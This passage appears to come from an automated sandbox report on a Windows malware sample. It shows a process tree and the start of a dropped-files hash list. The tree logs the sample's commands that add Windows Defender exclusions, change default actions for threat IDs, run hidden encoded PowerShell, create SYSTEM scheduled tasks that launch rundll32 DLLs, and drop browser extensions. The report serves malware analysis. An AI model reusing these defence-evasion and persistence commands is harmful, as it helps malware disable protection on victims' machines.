                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3996
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1912
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3648
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5812
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5924
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1868
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1832
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5464
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1596
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5312
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:5628
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5656
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:2904
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "gbOLmDLmo" /SC once /ST 05:48:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:5664
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /run /I /tn "gbOLmDLmo"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:5172
                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5692
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /DELETE /F /TN "gbOLmDLmo"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:1416
                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:2904
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 04:59:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\QZSDFPd.exe\" aV /XzAmdidkW 385118 /S" /V1 /F
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                              PID:6056
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /run /I /tn "yfARWRprRqUFWeTGf"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:924
                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:492
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:3364
                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:5492
                                                                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:5288
                                                                                                                                                                                                                    • C:\Windows\windefender.exe
                                                                                                                                                                                                                      C:\Windows\windefender.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                      PID:1912
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1092 -ip 1092
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:5268
                                                                                                                                                                                                                      • C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\QZSDFPd.exe
                                                                                                                                                                                                                        C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\QZSDFPd.exe aV /XzAmdidkW 385118 /S
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                        PID:5664
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:3592
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5748
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:5436
                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:3680
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4072
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:6124
                                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:4296
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:5764
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:5204
                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:1708
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:6128
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:5216
                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:5152
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:4800
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:5640
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                              PID:2452
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:4688
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:892
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:5472
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:5752
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:5652
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                        PID:4972
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                            PID:5656
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\LJiXYz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:6100
                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:6064
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "JHJXtPPPvDXVqpH2" /F /xml "C:\Program Files (x86)\zgoZGMcaU\rnRxDOE.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                      PID:1552
                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:5816
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /END /TN "JHJXtPPPvDXVqpH"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:2124
                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:3996
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "JHJXtPPPvDXVqpH"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:4672
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "HtmGfIeJlxktuW" /F /xml "C:\Program Files (x86)\epoBtGYzqLvU2\jyRPOaJ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                              PID:3672
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "beuYBzgGTLbmn2" /F /xml "C:\ProgramData\pICeQFkDCDDquYVB\cXanMdp.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                              PID:1652
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "ykYfCTTujiceFdOqI2" /F /xml "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\hrxqGxh.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                              PID:3264
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                              schtasks /CREATE /TN "fWcEirOkMoMQjrUKaey2" /F /xml "C:\Program Files (x86)\ecOJmsgAHWlsC\StrRPrn.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                              PID:5284
                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:5164
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "aNyMQclguOCSCcjxm" /SC once /ST 05:52:24 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nlcUipsDcFbdntMB\hqqYoCDY\doZuYjW.dll\",#1 /KldidP 385118" /V1 /F
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                PID:2772
                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:5712
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                  schtasks /run /I /tn "aNyMQclguOCSCcjxm"
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:4564
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "yfARWRprRqUFWeTGf"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:5204
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\hqqYoCDY\doZuYjW.dll",#1 /KldidP 385118
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:3260
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\hqqYoCDY\doZuYjW.dll",#1 /KldidP 385118
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                        PID:1500
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "aNyMQclguOCSCcjxm"
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:5748
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:5436
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                          • Registers COM server for autorun
                                                                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:5284
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\MsiExec.exe
                                                                                                                                                                                                                                                                                            C:\Windows\System32\MsiExec.exe -Embedding 80321068245675E48E0B1BD68A675E59
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:4912
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\MsiExec.exe
                                                                                                                                                                                                                                                                                            C:\Windows\System32\MsiExec.exe -Embedding D6382921EDC030A851A4B9ACD9A3F84B E Global\MSI0000
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                            PID:5660
                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 49E7D10FD64CB01E1E80881C43849847 M Global\MSI0000
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:3768
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                            "LogonUI.exe" /flags:0x4 /state0:0xa395d055 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                            PID:2868

                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                          • C:\Config.Msi\e5918c1.rbs
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            898KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            769da3fedc8f98ede040a19dd6748970

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            b960232d213e051648537e750d5c70c7d3f7cdb6

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            0b64236829bf2a8f000bc8e8061680313b6f5a1971b9c5e3f20318e7f62ccc61

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            0f6ce5321561b24e0b9f0cd36cb99ddc643c72a5887dd7a453414db81972c82c3ecaa60c7631891f9919bfe9656a8a43805394956d87ae7fff7e3f922aafa1e6

                                                                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            2.0MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            9bab21e751c72ccdebbf020344e01971

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            6b24876f400eda466074682e636317d7245e3f11

                                                                                                                                                                                                                                                                                            SHA256

